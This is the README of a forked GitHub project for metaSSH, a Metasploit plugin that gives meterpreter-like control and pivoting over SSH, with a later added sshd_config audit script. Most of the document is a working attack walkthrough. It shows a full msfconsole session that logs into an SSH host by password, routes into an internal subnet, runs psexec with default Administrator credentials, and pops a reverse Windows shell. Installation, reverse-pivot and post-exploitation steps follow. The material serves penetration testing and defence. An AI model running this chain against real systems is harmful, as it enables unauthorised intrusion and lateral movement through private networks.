forked from dirtyfilthy/metassh
metaSSH session plugin for metasploit v0.1
==========================================
metaSSH is a session plugin for metasploit that gives you a meterpreter-like interface over an ssh connection. When I started writing this code I just wanted to be able to cleanly reverse pivot over ssh from within metasploit, but I guess I got a bit carried away.
Features
--------
* Multi-channel
* SFTP over same connection
* Pivoting & reverse pivoting via "route"
* Scriptable
* Supports post-exploitation modules
* Meterpreter-like api
Example
-------
Here is an example of using metaSSH to pivot through an ssh host at 192.168.56.4 to run psexec on a win2k box at 192.168.57.4, inside the internal subnet. The reverse tcp payload then reverse pivots (automagically) through our ssh box to give us a shell.
```
       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 778 exploits - 415 auxiliary - 121 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops

msf > setg LogLevel 3
LogLevel => 3
msf > load meta_ssh
payloads/singles/ssh/metassh_session.rb
exploits/multi/ssh/login_password.rb
[*] Successfully loaded plugin: metaSSH
msf > use multi/ssh/login_password
msf > set RHOST 192.168.56.3
RHOST => 192.168.56.3
msf > set USER dsl
USER => dsl
msf > set PASS reverse
PASS => reverse
msf > set PAYLOAD ssh/metassh_session
PAYLOAD => ssh/metassh_session
msf > exploit -z
[*] Connecting to [email protected]:22 with password reverse
[*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28 03:51:16 +1300
[*] Session 1 created in the background.
msf > route add 192.168.57.0 255.255.255.0 1
[*] Route added
msf > use exploit/windows/smb/psexec
msf > set RHOST 192.168.57.4
RHOST => 192.168.57.4
msf > set LHOST 192.168.57.3
LHOST => 192.168.57.3
msf > set LPORT 5557
LPORT => 5557
msf > set SMBUser Administrator
SMBUser => Administrator
msf > set SMBPass password
SMBPass => password
msf > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf > exploit
[*] Started reverse handler on 192.168.57.3:5557 via the metaSSH on session 1
[*] Connecting to the server...
[*] Authenticating to 192.168.57.4:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \ekuCbYaL.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.4[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.4[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (TCzOpXwW - "MvQGwrInlegXtnXAgQmQ")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \ekuCbYaL.exe...
[*] Command shell session 2 opened (127.0.0.1:43621 -> 127.0.0.1:50324) at 2011-12-28 03:51:18 +1300

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>^Z
Background session 2? [y/N]  y
msf  exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

metaSSH > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background metaSSH script
    bglist        Lists running background scripts
    bgrun         Executes a metaSSH script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the ssh session
    help          Help menu
    info          Displays information about a Post module
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    quit          Terminate the ssh session
    run           Executes a metaSSH script or Post module
    use           Deprecated alias for 'load'

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    shell         Drop into a system command shell

Stdapi: Net Commands
====================

    Command       Description
    -------       -----------
    portfwd       forward local port to remote port

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

metaSSH >
```
Installation
------------
Make sure you are running the **latest** version of metasploit from github; metaSSH requires recent fixes to the bundled net/ssh library.

```
git clone https://github.com/rapid7/metasploit-framework.git
```

Get the latest version of metaSSH:

```
git clone [email protected]:dirtyfilthy/metassh.git
```

Copy meta_ssh.rb & the meta_ssh directory to your metasploit plugins directory:

```
cp -r meta_ssh.rb meta_ssh ~/metasploit/plugins
```
Usage
-----
After installation, run "load meta_ssh" in msfconsole to load the plugin. Two new exploit modules and one new payload module will become available. The exploits "multi/ssh/login_password" & "multi/ssh/login_pubkey" both let you log in to an ssh server through different means and are fairly self-explanatory. The payload for each of these must be "ssh/metassh_session", which will spawn metaSSH.
### Pivoting
To get pivoting to work, just add a route to your internal subnet through your metaSSH session, like so:

```
msf > route add 192.168.57.0 255.255.255.0 1
```

NOTE: For reverse pivoting, GatewayPorts MUST be set to yes in sshd_config on your pivot box. At some point I'll probably add an emulation mode with mkfifo & netcat.
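The GatewayPorts requirement above is also the setting a host owner would check to see whether an SSH server on their box can be used as a pivot. The following audit is an added example, not part of metaSSH: it reads a global sshd_config directive the way sshd does (first uncommented value wins, conditional Match blocks skipped) and reports whether GatewayPorts and AllowTcpForwarding would allow forwarding. The two sample configs are constructed for the demonstration.

```shell
# Added example, not part of metaSSH: audit an sshd_config for the forwarding
# settings that reverse pivoting through the host depends on. GatewayPorts yes
# lets remote forwards listen on all interfaces; AllowTcpForwarding (default
# yes) controls whether sshd forwards ports at all. Sample configs are constructed.

# Effective value of a global directive: the first uncommented occurrence wins,
# as in sshd, and everything after the first Match block is skipped because it
# is conditional. Prints the given default when the directive is unset.
# args: config-text key default
sshd_directive() {
  val=$(printf '%s\n' "$1" | awk -v k="$2" '
    tolower($1) == "match" { exit }
    /^[ \t]*#/ || NF == 0 { next }
    tolower($1) == tolower(k) { print $2; exit }')
  printf '%s\n' "${val:-$3}"
}

# Report settings that allow an SSH session on this host to be used as a pivot.
# Returns the number of findings (0 means nothing to report).
audit_pivot_settings() {
  findings=0
  gw=$(sshd_directive "$1" GatewayPorts no | tr 'A-Z' 'a-z')
  fwd=$(sshd_directive "$1" AllowTcpForwarding yes | tr 'A-Z' 'a-z')
  if [ "$gw" != no ]; then
    echo "FINDING: GatewayPorts $gw - remote forwards can bind on all interfaces"
    findings=$((findings + 1))
  fi
  if [ "$fwd" != no ]; then
    echo "FINDING: AllowTcpForwarding $fwd - port forwarding is permitted"
    findings=$((findings + 1))
  fi
  return "$findings"
}

WEAK_CFG='# pivot box configured as the README requires
Port 22
GatewayPorts yes'

HARD_CFG='Port 22
AllowTcpForwarding no
GatewayPorts no
# a later duplicate is ignored: sshd keeps the first value
GatewayPorts yes
Match User backup
    AllowTcpForwarding yes'

audit_pivot_settings "$WEAK_CFG" || echo "weak config: $? finding(s)"
audit_pivot_settings "$HARD_CFG" && echo "hardened config: no findings"
```

On a live host, feed the functions the output of `sshd -T` instead of the raw file to audit the effective configuration with Match blocks already resolved.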
### Post-exploitation modules
To use them, run them from the metaSSH session just like in meterpreter:

```
metaSSH > run post/linux/gather/checkvm
[*] Gathering System info ....
[+] This appears to be a VirtualBox Virtual Machine
```
Bugs
----
Forwarded ports (local and remote) are never released until the metaSSH session ends. For some reason I couldn't figure out, attempting to cancel port forwarding also kills any popped sessions. For any other bugs, please open an issue on my github ( https://github.com/dirtyfilthy/metassh ). Pull requests/fixes gratefully accepted.
Acknowledgements
----------------
This code is based heavily on the meterpreter session code included with metasploit and has in many cases simply been "cargo culted" and altered.
Author
-----
dirtyfilthy -- http://twitter.com/dirtyfilthy -- [email protected]